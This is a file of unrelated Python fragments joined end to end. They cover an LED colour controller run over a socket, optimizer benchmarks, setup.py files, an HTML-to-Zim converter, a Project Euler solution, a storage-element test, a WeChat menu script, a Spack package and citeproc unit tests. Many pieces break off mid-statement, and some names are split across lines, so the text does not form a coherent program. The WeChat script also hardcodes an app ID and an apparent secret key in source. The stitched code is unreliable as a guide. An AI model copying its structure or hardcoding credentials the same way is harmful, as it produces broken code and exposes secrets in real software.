def _getTimestampFromProto(): ts_millis = int( common_urns.constants.GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS.cons
to make it look better # here - probably want to avoid high values of # all because it will be white # (Emphasise/Reduce bass, mids, treble) l[i] *= float(equalizer[i]) l[i] = (l[i] * 256) - 1 # Use new val if > previous max if l[i] > self.max[i]: self.max[i] = l[i] else: # Otherwise, decrement max and use that # Gives colour falling effect self.max[i] -= self.fall[i] if self.max[i] < 0: self.max[i] = 0 l[i] = self.max[i] RGB = l lc.setRGB(RGB[0], RGB[1], RGB[2]) class AudioController: def __init__(self, leds): self.line_in = True self.leds = leds self.p = pyaudio.PyAudio() def more(self): try: # Return line in data return self.stream.read(CHUNK) except: print "line-in error" return 'ab' def analyse(self, data): # Convert to numpy array and filter data = np.fromstring(data, dtype=np.int16) # Convert int16 to float for dsp data = np.float32(data/32768.0) # Send to filter self.analyser.filter(data) self.analyser.change_leds() def record_setup(self): self.channels = 1 self.sample_rate = 44100 self.stream = self.p.open(format = pyaudio.paInt16, channels = self.channels, rate = self.sample_rate, input=True, frames_per_buffer=CHUNK) def loop(self): # Main processing loop # Do appropriate setup self.record_setup() self.analyser = FreqAnalyser(self.channels, self.sample_rate, self.leds) # Read the first block of audio data data = self.more() # While there is still audio left while (mode == "Music") or (mode == "Music1"): try: # Analyse data and change LEDs self.analyse(data) # Get more audio data data = self.more() except KeyboardInterrupt: break # Tidy up self.stream.close() self.p.terminate() ############################### other Effects functions ############################### class Effects: def Flasher(self): while (mode == "Flash"): random = self.Random_color() RGB = LedController().noWhite(random[0],random[1],random[2]) r = RGB[0] g = RGB[1] b = RGB[2] LedController().setRGB(r, g, b) time.sleep(tempo) def Strober(self): while (mode == "Strobe"): if tempo < 0: random = self.Random_color() LedController().setRGB(random[0],random[1],random[2]) self.wait_s(tempo) LedController().setRGB(0, 0, 0) self.wait_s(tempo) else: LedController().setRGB(255, 255, 255) self.wait_s(tempo) LedController().setRGB(0, 0, 0) self.wait_s(tempo) def Random_color(self): h = random.uniform(0, 100) / 100 s = random.uniform(95, 100) / 100 v = random.uniform(88, 100) / 100 return tuple(i * 255 for i in colorsys.hsv_to_rgb(h, s, v)) def wait_s(self,seconds): if seconds < 0: time.sleep((seconds) * (-1)) elif seconds >= 0: time.sleep(seconds) ###################################### Socket ###################################### class BrokerConnection(sockjs.tornado.SockJSConnection): clients = set() lc = LedController() rb = Rainbow() ef = Effects() ac = AudioController(lc) def on_open(self, info): # When new client comes in, will add it to the clients list self.clients.add(self) def on_message(self, message): # For every incoming message, broadcast it to all clients #self.broadcast(self.clients, message) # Set RGB color if not 'r' in locals(): r = 0 if not 'g' in locals(): g = 0 if not 'b' in locals(): b = 0 aRGB = self.message_analyser(message) if len(aRGB) == 3: r = float(aRGB[0]) g = float(aRGB[1]) b = float(aRGB[2]) if not mode == "nothing": mode = "nothing" time.sleep(0.1) self.lc.setRGB(r,g,b) if len(aRGB) == 2: global mode if not mode == "nothing": threadRunning = True else: threadRunning = False old_mode = mode mode = aRGB[0] setting = aRGB[1] if (mode == 'Rainbow'): global STEPS STEPS = float(setting) print "starting " + mode + "-service with " + str(STEPS) + " steps" if not mode == old_mode: start_new_thread(self.rb.fader, (r,g,b)) elif (mode == 'Music' or mode == 'Music1'): global MusicColor if mode == 'Music1': Mu
sicColor = setting.split('#') else: MusicColor = setting print "starting " + mode + "-service with " + str(MusicColor) + " color settings" if not mode == old_mode: start_new_thread(self.ac.loop, ()) elif (mode == "Flash"): global tempo tempo = float(setting) print "starting " + mode + "-service with
a tempo of " + str(tempo) if not mode == old_mode: start_new_thread(self.ef.Flasher, ()) elif (mode == "Strobe"): global tempo tempo = float(setting) print "starting " + mode + "-service with a tempo of " + str(tempo) if not mode == old_mode: start_new_thread(self.ef.Strober, ()) def message_analyser(self,msg): RGBcolor = [0,0,0] if msg.startswith('#'): RGBcolor = self.lc.hex_to_rgb(msg) elif msg.startswith('rgb'): RGBcolor = [float(i) for i in msg[4:-1].split(',')] elif msg.startswith('hsl'): hslString = msg[4:-1].split(',') for i in range(3): if '%' in hslString[i]: pos = hslString[i].index('%') hslString[i] = hslString[i][:pos] RGBcolor = self.lc.hsl_to_rgb([float(i) for i in hslString]) elif msg.count(',') == 1: RGBcolor = msg.split(',') elif msg.count(',') == 2 and not any(c.isalpha() for c in msg): RGBcolor = [float(i) for i in msg[4:-1].split(',')] else: RGBcolor = [0,0,0] print "Unsupported color model" return RGBcolor def on_close(self): # If client disconnects, remove him from the clients list self.clients.remove(self) def color_broadcaster(self,r,g,b): rgb = "rgb(" + str(r) + ", " + str(g) + ", " + str(b) + ")" self.send_message(rgb) if __name__ == '__main__': if len(sys.argv) > 1: options['immediate_flush'] = False # 1. Create SockJSRouter BrokerRouter = sockjs.tornado.SockJSRouter(BrokerConnection, '/rgb') # 2. Create Tornado web.Application app = web.Application(BrokerRouter.urls) # 3. Make application listen on port app.listen(port) # 4. Every 1 second dump current client count # ioloop.PeriodicCallback(BrokerConnection.dump_stats, 1000).start() # 5.
from time import time from benchmark import Benchmark from optimizer.optimizer import Optimizer from optimizer.simulator import Simulator from optimizer.evaluator import Evaluator from extra.printer import pprint, BLUE class EvaluatorPerf(Benchmark): def __init__(self, plant, orderList, testNumber): Benchmark.__init__(self, plant, orderList, testNumber) self.prefix = "evaluator" class EvaluatorMachinesPerf(EvaluatorPerf): def __init__(self, plant, orderList, testNumber): EvaluatorPerf.__init__(self, plant, orderList, testNumber) self.testName = "NumberOfMachines" self.startValue = 1 def bench(self): recipes = [] for o in self.orderList.orders: recipes.append(o.recipe.recipe[:]) o.recipe.recipe = [] machines = self.plant.machines[:] self.plant.machines = [] i = self.startValue while i <= len(machines): pprint("PERF Number of machines = " + str(i), BLUE) self.plant.machines = machines[:i] for j, o in enumerate(self.orderList.orders): o.recipe.recipe = recipes[j][:i] optimizer = Optimizer(self.plant, self.orderList, Simulator(self.plant), Evaluator(self.plant)) optimizer.populationSize = 2 optimizer.iterations = 2 optimizer.indivMutationRate = 0.5 optimizer.selectionRate = 0.5 optimizer.mutationRange = 10 schedules = optimizer.run() evaluator = Evaluator(self.plant) t = time() evaluator.evaluate(schedules[0]) t = time() - t self.addCairoPlotTime(t) self.addGnuPlotTime(i, t) i += 1 class EvaluatorOrdersPerf(EvaluatorPerf): def __init__(self, plant, orderList, testNumber): EvaluatorPerf.__init__(self, plant, orderList, testNumber) self.testName = "NumberOfOrders" self.startValue = 2 def bench(s
elf): orders = self.orderList.orders[:] self.orderList.orders = [] i = self.startValue while i <= len(orders): pprint("PERF Number of orders = " + str(i), BLUE) self.orderList.orders = orders[:i] optimizer = Optimizer(self.plant, self.orderList, Simulator(self.plant), Evaluator(self.plant)) optimizer.populationSize = 2 optimizer.iterations = 2 opt
imizer.indivMutationRate = 0.5 optimizer.selectionRate = 0.5 optimizer.mutationRange = 10 schedules = optimizer.run() evaluator = Evaluator(self.plant) t = time() evaluator.evaluate(schedules[0]) t = time() - t self.addCairoPlotTime(t) self.addGnuPlotTime(i, t) i += 1 class EvaluatorLargeValuesPerf(EvaluatorPerf): def __init__(self, plant, orderList, testNumber): EvaluatorPerf.__init__(self, plant, orderList, testNumber) self.testName = "LargeValuesMultiplier" def bench(self): val = 2 i = self.startValue while i < 10: pprint("PERF Large Value = " + str(i * val), BLUE) for o in self.orderList.orders: o.deadline *= val for r in o.recipe.recipe: r[1] *= val optimizer = Optimizer(self.plant, self.orderList, Simulator(self.plant), Evaluator(self.plant)) optimizer.populationSize = 2 optimizer.iterations = 2 optimizer.indivMutationRate = 0.5 optimizer.selectionRate = 0.5 optimizer.mutationRange = 500 schedules = optimizer.run() evaluator = Evaluator(self.plant) t = time() evaluator.evaluate(schedules[0]) t = time() - t self.addCairoPlotTime(t) self.addGnuPlotTime((i + 1) * val, t) i += 1
# -*- coding: utf-8 -*- import os from setuptools import setup, find_packages EXCLUDE_FROM_PACKAGES = ['test_*',] VERSION = "1.1.0" INSTALL_REQUIRES = [ 'requests', 'Flask' ] TESTS_REQUIRE = [ 'nose', 'httpretty' ] setup( name='Flask-HTTP-Forwarding', version=VERSION, url='http://www.github.com/casetext/flask-http-forwarding', author='Casetext, Inc.', author_email='casetext@casetext.com', description='Flask extension implementing HTTP forwarding', license='MIT', packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES), include_package_data=True, install_requires=INSTALL_REQUIRES, tests_require=TESTS_REQUIRE, test_suite="nose.collector", platforms='any', classifie
rs=[ 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet :: WWW/HTTP :: HTTP Servers', 'Topic :: Software Development :: Libraries :
: Python Modules' ] )
i": "//", "em": "//", "u": "__", "ins": "__", "mark": "__", "pre": "''", "code": "''", "blockquote": "", "strike": "~~", "del": "~~", "p": "", "div": "", "ol": "", "ul": "", "dl": "", "dt": "", "dd": "\t", "li": "", "table": "", "caption": "", "tr": "", "th": "|", "td": "|", "hr": "-----\n", "sup": "^{", "sub": "_{", "span": "", "figure": "", "figcaption": "\n", "abbr": "", "q": "", "time": ""} self.end = {"h1": " ======\n", "h2": " =====\n", "h3": " ====\n", "h4": " ===\n", "h5": " ==\n", "iframe": "]]", "strong": "**", "b": "**", "i": "//", "em": "//", "u": "__", "ins": "__", "mark": "__", "pre": "''", "code": "''", "blockquote": "", "strike": "~~", "del": "~~", "p": "\n", "div": "\n", "a": "]]", "ol": "\n", "ul": "\n", "dl": "\n", "dt": ":\n", "dd": "\n", "li": "", "table": "\n", "caption": "\n", "tr": "|\n", "th": "", "td": "", "sup": "}", "sub": "}", "figure": "\n", "figcaption": "\n"} self.list_type = "ol" self.item_no = 0 self.inside_p = False self.inside_pre = False self.pre_data = "" self.inside_blockquote = False self.inside_tag = "" #Indicate label on which we are self.start_tag = "" #Initial tag in case we have to delete it self.del_tag = "" self.tag_attrib = "" #Tag Attribute Value self.folder = None self.a_href = "" #Link of a tag self.inside_li = False self.list_level = -1 self.inside_iframe = False self.inside_span = False self.inside_dl = False self.inside_table = False def handle_starttag(self, tag, attrs): #If we are in a non-nestable tag we do nothing if self.inside_tag and not (self.inside_tag == "a" and tag == "img" and self.a_href) and not(self.inside_tag == "th" or self.inside_tag == "td" or self.inside_tag == "dt" or self.inside_tag == "dd") and not (tag == "a" and (self.inside_tag == "b" or self.inside_tag == "strong" or self.inside_tag == "i" or self.inside_tag == "em" or self.inside_tag == "u" or self.inside_tag == "ins" or self.inside_tag == "mark" or self.inside_tag == "strike" or self.inside_tag == "del") and self.zim_str.endswith(self.beg[self.inside_tag])): return if tag == "blockquote": self.inside_blockquote = True #If the tag a is in a non-nestable one, tag a prevails and the previous one is deleted. In block sentences it is not done if tag == "a" and self.inside_tag and ((self.inside_tag != "pre" and self.inside_tag != "code")): self.del_tag = self.inside_tag self.zim_str = self.zim_str[:len(self.zim_str)-len(self.start_tag)] #Initialize non-nestable tag if tag != "td" and tag != "dd" and self.beg.get(tag) or tag == "a" and not self.inside_tag: self.inside_tag = tag if (tag == "pre" or tag == "code"): #If pre in p self.inside_pre = True if tag in list(self.beg.keys()): #Add blank when tag not start line if self.zim_str.endswith(("\n", "(", "[", "\t", "\"", " ", "/", '\xa0')): blank = "" else: blank = " " self.zim_str += blank + self.beg[tag] self.start_tag = self.beg[tag] #Store start tag to delete it could be somewhere else if tag == "p": self.inside_p = True if self.inside_blockquote: self.zim_str += "\t" elif tag == "del": datetime = assoc("datetime", attrs) if datetime is not None: self.tag_attrib = " (" + datetime + ")" elif tag == "abbr": title = assoc("title", attrs) if title is not None: self.tag_attrib = " (" + title + ")" elif tag == "q": cite = assoc("cite", attrs) if cite is not None: self.tag_attrib = " ([[#|" + cite + "]])" self
.zim_str += '"' elif tag == "time": datetime = assoc("datetime", attrs) if datetime is not None: self.tag_attrib = " (" + datetime + ")" elif tag == "a": href = assoc("href", attrs) self.a_href
= href #ref of tag if href is None: href = "#" #Add blank when tag not start line if self.zim_str.endswith(("\n", "(", "[", "\t", "\"", " ", "/", '\xa0')): blank = "" else: blank = " " #If we are in a table we escape | if self.inside_table: pipe = "\|" else: pipe = "|" self.zim_str += blank + "[[{}".format(href) + pipe elif tag == "ol": #if we are in a definition list the tab is not put to the dd if self.inside_dl and self.zim_str.endswith("\t"): self.zim_str = self.zim_str[:len(self.zim_str)-len("\t")] #If it is not at the beginning of the line an enter is added if self.zim_str and not self.zim_str.endswith("\n"): self.zim_str += "\n" self.list_type = "ol" self.item_no = 0 self.list_level += 1 elif tag == "ul": #if we are in a definition list the tab is not put to the dd if self.inside_dl and self.zim_str.endswith("\t"): self.zim_str = self.zim_str[:len(self.zim_str)-len("\t")] #If it is not at the beginning of the line an enter is added if self.zim_str and not self.zim_str.endswith("\n"): self.zim_str += "\n" self.list_type = "ul" self.item_no = 0 self.list_level += 1 elif tag == "li": #If you are in a blockquote add tab if self.inside_blockquote: self.zim_str += "\t" #If tag li no close add enter if self.inside_li and (self.zim_str and not self.zim_str.endswith("\n")): self.zim_str += "\n" self.item_no += 1 self.zim_str += "\t" * self.list_level #Add level if self.list_type == "ol": self.zim_str += str(self.item_no) + ". " else: self.zim_str += "* " self.inside_li = True elif tag == "img": src = assoc("src", attrs) if src is None or src == "": src = "#" alt = assoc("alt", attrs) if alt is None: alt = "Image" if src != "#" and not self.inside_table: #If the image and the link match, only the image remains and the label is deleted if self.inside_tag == "a" and src == self.a_href: self.zim_str = self.zim_str[:len(self.zim_str)-len("[[" + self.a_href + "|")]
from setuptools import setup, find_packages from helga_github_meta import __version__ as version setup( name='helga-github-meta', version=version, description=('Provide information for github related metadata'), classifiers=[ 'Development Status :: 4 - Beta', 'Topic :: Communications :: Chat :: Internet Relay Chat', 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Software Developme
nt :: Libraries :: Python Modules', 'Topic :: Communications :: Chat :: Internet Relay Chat'], ke
ywords='irc bot github-meta urbandictionary urban dictionary ud', author='Jon Robison', author_email='narfman0@gmail.com', url='https://github.com/narfman0/helga-github-meta', license='LICENSE', packages=find_packages(), include_package_data=True, py_modules=['helga_github_meta.plugin'], zip_safe=True, install_requires=['helga', 'requests'], test_suite='tests', entry_points=dict( helga_plugins=[ 'github-meta = helga_github_meta.plugin:github_meta', ], ), )
from django.contrib import admin from library.models import Author,
Book, Genre, Review ad
min.site.register(Author) admin.site.register(Book) admin.site.register(Genre) admin.site.register(Review)
# -*- coding: utf-8 -*- """ Largest product in a grid https://projecteuler.net/problem=11 """ GRID = """ 08 02 22 97 38 15 00 40 00 75 04 05 07 78 52 12 50 77 91 08 49 49 99 40 17 81 18 57 60 87 17 40 98 43 69 48 04 56 62 00 81 49 31 73 55 79 14 29 93 71 40 67 53 88 30 03 49 13 36 65 52 70 95 23 04 60 11 42 69 24 68 56 01 32 56 71 37 02 36 91 22 31 16 71 51 67 63 89 41 92 36 54 22 40 40 28 66 33 13 80 24 47 32 60 99 03 45 02 44 75 33 53 78 36 84 20 35 17 12 50 32 98 81 28 64 23 67 10 26 38 40 67 59 54 70 66 18 38 64 70 67 26 20 68 02 62 12 20 95 63 94 39 63 08 40 91 66 49 94 21 24 55 58 05 66 73 99 26 97 17 78 78 96 83 14 88 34 89 63 72 21 36 23 09 75 00 76 44 20 45 35 14 00 61 33 97 34 31 33 95 78 17 53 28 22 75 31 67 15 94 03 80 04 62 16 14 09 53 56 92 16 39 05 42 96 35 31 47 55 58 88 24 00 17 54 24 36 29 85 57 86 56 00 48 35 71 89 07 05 44 44 37 44 60 21 58 51 54 17 58 19 80 81 68 05 94 47 69 28 73 92 13 86 52 17 77 04 89 55 40 04 52 08 83 97 35 99 16 07 97 57 32 16 26 26 79 33 27 98 66 88 36 68 87 57 62 20 72 03 46 33 67 46 55 12 32 63 93 53 69 04 42 16 73 38 25 39 11 24 94 72 18 08 46 29 32 40 62 76 36 20 69 36 41 72 30 23 88 34 62 99 69 82 67 59 85 74 04 36 16 20 73 35 29 78 31 90 01 74 31 49 71 48 86 81 16 23 57 05 54 01 70 54 71 83 51 54 69 16 92 33 48 61 43 52 01 89 19 67 48 """ def adjacent_numbers_gen(grid): # right for i, row in enumerate(grid): for j, a in enumerate(row): if j + 3 == len(row): break b, c, d = row[j + 1], row[j + 2], row[j + 3] yield a, b, c, d # down for i, row in enumerate(grid): if i + 3 == len(grid): break for j, a in enumerate(row): b, c, d = grid[i + 1][j], grid[i + 2][j], grid[i + 3][j] yield a, b, c, d # diagonally right + down for i, row in enumerate(grid): if i + 3 == len(grid): break for j, a in enumerate(row): if j + 3 == len(row): break b, c, d = grid[i + 1][j + 1], grid[i + 2][j + 2], grid[i + 3][j + 3] yield a, b, c, d # diagonally left + down for i, row in enumerate(grid): if i + 3 == len(grid): break for j, a in enumerate(row): if j - 3 < 0: continue b, c, d = grid[i + 1][j - 1], grid[i + 2][j - 2], grid
[i + 3][j - 3] yield a, b, c, d grid = [] for line in GRID.strip().split('\n'): grid.append([int(x.strip()) for x in line.split()]) max_product = 0 for a, b, c, d in ad
jacent_numbers_gen(grid): max_product = max(max_product, a * b * c * d) print max_product
from
split_settings.tools import optional, include include( 'components/base.py', 'components/pagination.py', optional('components/global.py'), ## # Local should be after product.py because if default value has not # been defined in the DATABASE dictionary then it must be defined. 'components/local.py',
scope=globals() )
cal path containing test files. There should be a folder called Workflow containing (the files can be simple textfiles) # FolderA # -FolderAA # --FileAA # -FileA # FolderB # -FileB # File1 # File2 # File3 def _mul(txt): """ Multiply the input text enough time so that we reach the expected file size """ return txt * (max(1, FILE_SIZE / len(txt))) class basicTest(unittest.TestCase): """ This performs all the test, and is just called for a specific plugin """ def setUp(self, pluginToTest): """ Put in place the local directory structure""" #gLogger.setLevel( 'DEBUG' ) self.LOCAL_PATH = tempfile.mkdtemp() self.storageName = STORAGE_NAME # create the local structure workPath = os.path.join(self.LOCAL_PATH, 'Workflow') os.mkdir(workPath) os.mkdir(os.path.join(workPath, 'FolderA')) with open(os.path.join(workPath, 'FolderA', 'FileA'), 'w') as f: f.write(_mul('FileA')) os.mkdir(os.path.join(workPath, 'FolderA', 'FolderAA')) with open(os.path.join(workPath, 'FolderA', 'FolderAA', 'FileAA'), 'w') as f: f.write(_mul('FileAA')) os.mkdir(os.path.join(workPath, 'FolderB')) with open(os.path.join(workPath, 'FolderB', 'FileB'), 'w') as f: f.write(_mul('FileB')) for fn in ["File1", "File2", "File3"]: with open(os.path.join(workPath, fn), 'w') as f: f.write(_mul(fn)) # When testing for a given plugin, this plugin might not be able to # write or read. In this case, we use this specific plugins # ONLY for the operations it is allowed to specSE = StorageElement(self.storageName, plugins=pluginToTest) genericSE = StorageElement(self.storageName) pluginProtocol = specSE.protocolOptions[0]['Protocol'] if pluginProtocol in specSE.localAccessProtocolList: print("Using specific SE with %s only for reading" % pluginToTest) self.readSE = specSE else: print("Plugin %s is not available for read. Use a generic SE" % pluginToTest) self.readSE = genericSE if pluginProtocol in specSE.localWriteProtocolList: print("Using specific SE with %s only for writing" % pluginToTest) self.writeSE = specSE else: print("Plugin %s is not available for write. Use a generic SE" % pluginToTest) self.writeSE = genericSE # Make sure we are testing the specific plugin at least for one self.assertTrue(self.readSE == specSE or self.writeSE == specSE, "Using only generic SE does not make sense!!") basicTest.clearDirectory(self) def tearDown(self): """ Remove the local tree and the remote files """ shutil.rmtree(self.LOCAL_PATH) self.clearDirectory() def clearDirectory(self): """ Removing target directory """ print("==================================================") print("==== Removing
the older Directory ================") workflow_folder = DESTINATION_PATH + '/Workflow' res = self.writeSE.removeDirectory(workflow_folder) if not res['OK']: print("basicTest.clearDirectory: Workflow folder maybe not empty") print("==================================================") def testWorkflow(self): """ This perform a complete workflow puting, removing, stating files and directories """
putDir = {os.path.join(DESTINATION_PATH, 'Workflow/FolderA'): os.path.join(self.LOCAL_PATH, 'Workflow/FolderA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB'): os.path.join(self.LOCAL_PATH, 'Workflow/FolderB')} createDir = [os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FolderAA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FolderABA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FolderAAB') ] putFile = {os.path.join(DESTINATION_PATH, 'Workflow/FolderA/File1'): os.path.join(self.LOCAL_PATH, 'Workflow/File1'), os.path.join(DESTINATION_PATH, 'Workflow/FolderAA/File1'): os.path.join(self.LOCAL_PATH, 'Workflow/File1'), os.path.join(DESTINATION_PATH, 'Workflow/FolderBB/File2'): os.path.join(self.LOCAL_PATH, 'Workflow/File2'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB/File2'): os.path.join(self.LOCAL_PATH, 'Workflow/File2'), os.path.join(DESTINATION_PATH, 'Workflow/File3'): os.path.join(self.LOCAL_PATH, 'Workflow/File3')} isFile = {os.path.join(DESTINATION_PATH, 'Workflow/FolderA/File1'): os.path.join(self.LOCAL_PATH, 'Workflow/File1'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB/FileB'): os.path.join(self.LOCAL_PATH, 'Workflow/FolderB/FileB'), } listDir = [os.path.join(DESTINATION_PATH, 'Workflow'), os.path.join(DESTINATION_PATH, 'Workflow/FolderA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB') ] getDir = [os.path.join(DESTINATION_PATH, 'Workflow/FolderA'), os.path.join(DESTINATION_PATH, 'Workflow/FolderB') ] removeFile = [os.path.join(DESTINATION_PATH, 'Workflow/FolderA/File1')] rmdir = [os.path.join(DESTINATION_PATH, 'Workflow')] ##### Computing local adler and size ##### fileAdlers = {} fileSizes = {} for lfn, localFn in isFile.iteritems(): fileAdlers[lfn] = fileAdler(localFn) fileSizes[lfn] = getSize(localFn) ########## uploading directory ############# res = self.writeSE.putDirectory(putDir) self.assertEqual(res['OK'], True) # time.sleep(5) res = self.readSE.listDirectory(listDir) self.assertEqual(any(os.path.join(DESTINATION_PATH, 'Workflow/FolderA/FileA') in dictKey for dictKey in res['Value']['Successful'][os.path.join(DESTINATION_PATH, 'Workflow/FolderA')]['Files'].keys()), True) self.assertEqual(any(os.path.join(DESTINATION_PATH, 'Workflow/FolderB/FileB') in dictKey for dictKey in res['Value']['Successful'][os.path.join(DESTINATION_PATH, 'Workflow/FolderB')]['Files'].keys()), True) ########## createDir ############# res = self.writeSE.createDirectory(createDir) self.assertEqual(res['OK'], True) res = res['Value'] self.assertEqual(res['Successful'][createDir[0]], True) self.assertEqual(res['Successful'][createDir[1]], True) self.assertEqual(res['Successful'][createDir[2]], True) ######## putFile ######## res = self.writeSE.putFile(putFile) self.assertEqual(res['OK'], True) # time.sleep(5) res = self.readSE.isFile(isFile) self.assertEqual(res['OK'], True) self.assertTrue(all([x for x in res['Value']['Successful'].itervalues()])) # self.assertEqual( res['Value']['Successful'][isFile[0]], True ) # self.assertEqual( res['Value']['Successful'][isFile[1]], True ) ######## getMetadata ########### res = self.readSE.getFileMetadata(isFile) self.assertEqual(res['OK'], True) res = res['Value']['Successful'] self.assertEqual(any(path in resKey for path in isFile for resKey in res.keys()), True) # Checking that the checksums and sizes are correct for lfn in isFile: self.assertEqual(res[lfn]['Checksum'], fileAdlers[lfn]) self.assertEqual(res[lfn]['Size'], fileSizes[lfn]) ####### getDirectory ###### res = self.readSE.getDirectory(getDir, os.path.join(self.LOCAL_PATH, 'getDir'))
# -*- coding:utf-8 -*- import tornado.web from wechatpy.parser import parse_message from wechatpy import WeChatClient TOKEN = '123456' APPID = 'wxecb5391ec8a58227' SECRET = 'fa32576b9daa6fd0
20c0104e6092196a' import sys reload(sys) sys.setdefaultencoding("utf-8") class BaseHandler(object): def get_client(self): client = WeChatClient(APPID, SECRET) a = client.menu.create({ "button": [ {
"type": "click", "name": "阅读", "key": "TODAY_READ" }, { "type": "click", "name": "音乐", "key": "TODAY_MUSIC" }, { "name": "时光", "sub_button": [ { "type": "click", "name": "状态", "key": "TODAY_STATUS" }, { "type": "view", "name": "故事", "url": "http://wufazhuce.com/" }, { "type": "view", "name": "再见", "url": "http://byetimes.com/" }, { "type": "view", "name": "关于我们", "url": "http://www.suyafei.com/" } ] } ], }) return a if __name__ == '__main__': client = BaseHandler().get_client() print (client)
############################################################################## # Copyr
ight (c) 2013-2018, Lawrence Livermore National Security, LLC. # Produced at the Lawrence Livermore National Laboratory. # # This file is
part of Spack. # Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved. # LLNL-CODE-647188 # # For details, see https://github.com/spack/spack # Please also see the NOTICE and LICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Foundation) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## from spack import * class Prodigal(MakefilePackage): """Fast, reliable protein-coding gene prediction for prokaryotic genomes.""" homepage = "https://github.com/hyattpd/Prodigal" url = "https://github.com/hyattpd/Prodigal/archive/v2.6.3.tar.gz" version('2.6.3', '5181809fdb740e9a675cfdbb6c038466') def install(self, spec, prefix): make('INSTALLDIR={0}'.format(self.prefix), 'install') def setup_environment(self, spack_env, run_env): run_env.prepend_path('PATH', prefix)
t.mark.parametrize('name, expected', convert_to_name_pair_list) def test_convert_to_name_pair(self, name, expected): """ Test if name pairing works """ assert self.test_class._convert_to_name_pair(name) == expected @pytest.mark.parametrize('author_elem, expected', [(dict(), None), ({'affiliation' : [{'name' : 'Porto'}]}, 'Porto'), ({'affiliation' : [{'name' : 'Porto'}, {'name' : 'Lissabon'}]}, 'Porto')]) def test_get_affiliation(self, author_elem, expected): """ Must return the first affiliation if any """ assert self.test_class._get_affiliation(author_elem) ==
expected def test_get_abstract(self, citeproc): """ Abstract must be set """ assert self.test_class._get_abstract(citeproc) == citeproc['abstract'] def test_get_abstact_missing(self, citeproc):
""" If no abstract, assert blank """ del citeproc['abstract'] assert self.test_class._get_abstract(citeproc) == '' def test_get_abstract_escaping(self, citeproc): """ Must do some escaping, e.g. we sometimes get some jats tags """ # We wrap the current abstract into some jats expected = citeproc['abstract'] citeproc['abstract'] = r'<jats:p>{}<\/jats:p>'.format(expected) assert self.test_class._get_abstract(citeproc) == expected def test_get_affiliations(self, affiliations, citeproc): """ Must have the same length as citeproc['author'] and identical to list of affiliations """ r = self.test_class._get_affiliations(citeproc) assert len(r) == len(citeproc.get('author')) assert r == affiliations def test_get_affiliations_no_authors(self, citeproc): """ Must rais exception """ del citeproc['author'] with pytest.raises(CiteprocAuthorError): self.test_class._get_affiliations(citeproc) def test_get_authors(self, citeproc): """ The list of authors shall be a list of BareNames """ r = self.test_class._get_authors(citeproc) assert isinstance(r, list) for barename in r: assert isinstance(barename, BareName) def test_get_authors_empty_list(self, citeproc): """ The list of authors must not be empty """ citeproc['author'] = [] with pytest.raises(CiteprocAuthorError): self.test_class._get_authors(citeproc) def test_get_authors_no_list(self, citeproc): """ author in citeproc must be a list """ del citeproc['author'] with pytest.raises(CiteprocAuthorError): self.test_class._get_authors(citeproc) def test_get_authors_invalid_author(self, monkeypatch, citeproc): """ If 'None' is an entry, raise exception """ # We mock the function and let it return None, so that name_pairs is a list of None monkeypatch.setattr(self.test_class, '_convert_to_name_pair', lambda x: None) with pytest.raises(CiteprocAuthorError): self.test_class._get_authors(citeproc) def test_get_container(self, container_title, citeproc): """ Must return container title """ assert self.test_class._get_container(citeproc) == container_title def test_get_container_missing(self): """ Must return exception """ with pytest.raises(CiteprocContainerTitleError): self.test_class._get_container(dict()) def test_get_doi(self, citeproc): """ Must return the DOI """ assert self.test_class._get_doi(citeproc) == citeproc['DOI'] def test_get_doi_invalid(self): """ Must raise exception """ with pytest.raises(CiteprocDOIError): self.test_class._get_doi({'DOI' : 'spanish inquisition'}) def test_get_doi_missing(self): """ Must raise exception """ with pytest.raises(CiteprocDOIError): self.test_class._get_doi(dict()) @pytest.mark.parametrize('issn, expected', [('1234-5675', '1234-5675'), (['1234-5675', ], '1234-5675'), ([], '')]) def test_get_issn(self, citeproc, issn, expected): """ Must return the issn or '' """ citeproc['ISSN'] = issn assert self.test_class._get_issn(citeproc) == expected def test_get_issn_missing(self, citeproc): """ Must return '' """ del citeproc['ISSN'] assert self.test_class._get_issn(citeproc) == '' @pytest.mark.usefixtures('db', 'mock_alias_publisher_increment', 'mock_journal_find', 'mock_publisher_find') @pytest.mark.parametrize('journal', [Journal(publisher=Publisher()), None]) def test_get_oairecord_data(self, monkeypatch, container_title, issn, citeproc, journal): """ We do some assertions on the results, but relatively lax, as we test the called functions, too """ monkeypatch.setattr(Journal, 'find', lambda issn, title: journal) r = self.test_class._get_oairecord_data(citeproc) assert r['doi'] == citeproc['DOI'] assert r['description'] == citeproc['abstract'] assert r['identifier'] == doi_to_crossref_identifier(citeproc['DOI']) assert r['issn'] == issn assert r['issue'] == citeproc['issue'] assert r['journal'] == journal assert r['journal_title'] == container_title assert r['pages'] == citeproc['page'] assert r['pdf_url'] == '' # Is not OA assert r['pubdate'] == date(*citeproc['issued']['date-parts'][0]) assert r['publisher_name'] == citeproc['publisher'] assert r['pubtype'] == citeproc['type'] assert r['source'] == OaiSource.objects.get(identifier='crossref') assert r['splash_url'] == doi_to_url(citeproc['DOI']) assert r['volume'] == citeproc['volume'] @pytest.mark.usefixtures('db', 'mock_journal_find', 'mock_publisher_find') def test_get_oairecord_data_missing(self, 